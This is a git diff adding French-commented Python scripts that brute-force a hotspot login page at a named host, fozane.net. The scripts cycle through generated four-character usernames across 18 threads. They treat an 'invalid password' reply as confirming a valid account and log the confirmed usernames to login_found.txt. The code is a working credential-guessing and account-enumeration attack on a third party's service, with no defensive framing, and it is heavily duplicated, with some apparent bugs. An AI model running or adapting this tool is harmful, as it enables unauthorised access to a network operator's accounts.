letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=34 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user) + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") + +print(" demarage du moteur ... \n\n") + + +t1=threading.Thread(target=crack) +t2=threading.Thread(target=crack2) +t3=threading.Thread(target=crack3) +t4=threading.Thread(target=crack4) +t5=threading.Thread(target=crack5) +t6=threading.Thread(target=crack6) +t7=threading.Thread(target=crack7) +t8=threading.Thread(target=crack8) +t9=threading.Thread(target=crack9) +t10=threading.Thread(target=crack10) +t11=threading.Thread(target=crack11) +t12=threading.Thread(target=crack12) +t13=threading.Thread(target=crack13) +t14=threading.Thread(target=crack9) +t15=threading.Thread(target=crack10) +t16=threading.Thread(target=crack11) +t17=threading.Thread(target=crack12) +t18=threading.Thread(target=crack13) +t1.start() +t2.start() +t3.start() +t4.start() +t5.start() +t6.start() +t7.start() +t8.start() +t9.start() +t10.start() +t11.start() +t12.start() +t13.start() +t14.start() +t15.start() +t16.start() +t17.start() +t18.start() +t1.join() +t2.join() +t3.join() +t4.join() +t5.join() +t6.join() +t7.join() +t8.join() +t9.join() +t10.join() +t11.join() +t12.join() +t13.join() +t14.join() +t15.join() +t16.join() +t17.join() +t18.join() + diff --git a/crack/crack6.py b/crack/crack6.py new file mode 100644 index 0000000..86d40b4 --- /dev/null +++ b/crack/crack6.py @@ -0,0 +1,1344 @@ +# modules necessaires +import requests +import time +import threading +last=0 + +# code spagetti enfin fonction X18 pour les thread +def crack(): + # initialisation des variables a utiliser + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=1 + x,y,z,u=0,0,0,last + # algo pour traiter les decalage + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + # coeur du moteur... va permettre la generation ordonner des logins + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + # envoye ; reception ; et traitement automatique des requetes HTTP + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + # algo pour calculer le debit du bruteforce + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + # les logins corrects seront automatiquement ecrit dans un fichier nommer login_found.txt + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack2(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=2 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack3(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=4 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack4(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=6 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack5(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=8 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack6(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=10 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack7(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=12 + y,z,u=0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack8(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=14 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack9(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=16 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack10(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=18 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack11(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=20 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack12(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=22 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack13(): + + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=24 + x,y,z,u=0,0,0,last + if rec==1: + long2=0 + long3=2 + elif 2<=rec<=26: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack14(): + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=26 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack15(): + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=28 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack16(): + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=30 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack17(): + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=32 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") +def crack18(): + letra=['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','v','w','u','x','y','z','0','1','2','3','4','5','6','7','8','9',''] + lettre=[] + longa=26 + long=longa + bou=1 + repo5=4 + lettre=letra + num=4 + long2=0 + long3=0 + rec=34 + x,y,z,u=0,0,0,last + if 26<=rec<=36: + long2=rec + long3=rec+2 + x=long2 + while 1: + bou=1 + t1=time.time() + user=(lettre[x]+lettre[y]+lettre[z]+lettre[u]) + paz=lettre[x] + payload = dict(username=user, password=paz) + x+=1 + if x==long3: + x=long2 + y+=1 + if num==1: + break + else: + pass + elif y==long: + x=long2 + y=0 + z+=1 + if num==2: + break + else: + pass + elif z==long: + x=long2 + y=0 + z=0 + u+=1 + if num==3: + break + else : + pass + elif u==long: + if num==4: + break + while bou: + try: + r = requests.post('http://fozane.net/login?dst=http%3A%2F%2Fwww.msftconnecttest.com%2Fredirect', data=payload) + bou=0 + except : + print("connexion perdu, reconnexion...",end="\r") + t2=time.time() + t4=int((t2-t1)*(36**4)) + t3=int((1/(t2-t1))*19) + if "invalid password" in r.text: + print("login et password trouver : {},{}".format(user,user)) + fd=open("login_found.txt",'a') + fd.write("login : "+user+"\n") + fd.close() + else : + print("login {} incorrect || {} login/sec || {} sec restant ".format(user,t3,t4),end="\r") + +print(" \t\t DEMARRAGE DU CRACKEUR ... \n\n") + +# 18 thread ecrit en spagettti , ainsi multiplier par 18 la vitesse du moteur +t1=threading.Thread(target=crack) +t2=threading.Thread(target=crack2) +t3=threading.Thread(target=crack3) +t4=threading.Thread(target=crack4) +t5=threading.Thread(target=crack5) +t6=threading.Thread(target=crack6) +t7=threading.Thread(target=crack7) +t8=threading.Thread(target=crack8) +t9=threading.Thread(target=crack9) +t10=threading.Thread(target=crack10) +t11=threading.Thread(target=crack11) +t12=threading.Thread(target=crack12) +t13=threading.Thread(target=crack13) +t14=threading.Thread(target=crack9) +t15=threading.Thread(target=crack10) +t16=threading.Thread(target=crack11) +t17=threading.Thread(target=crack12) +t18=threading.Thread(target=crack13) +t1.start() +t2.start() +t3.start() +t4.start() +t5.start() +t6.start() +t7.start() +t8.start() +t9.start() +t10.start() +t11.start() +t12.start() +t13.start() +t14.start() +t15.start() +t16.start() +t17.start() +t18.start() +t1.join() +t2.join() +t3.join() +t4.join() +t5.join() +t6.join() +t7.join() +t8.join() +t9.join() +t10.join() +t11.join() +t12.join() +t13.join() +t14.join() +t15.join() +t16.join() +t17.join() +t18.join() +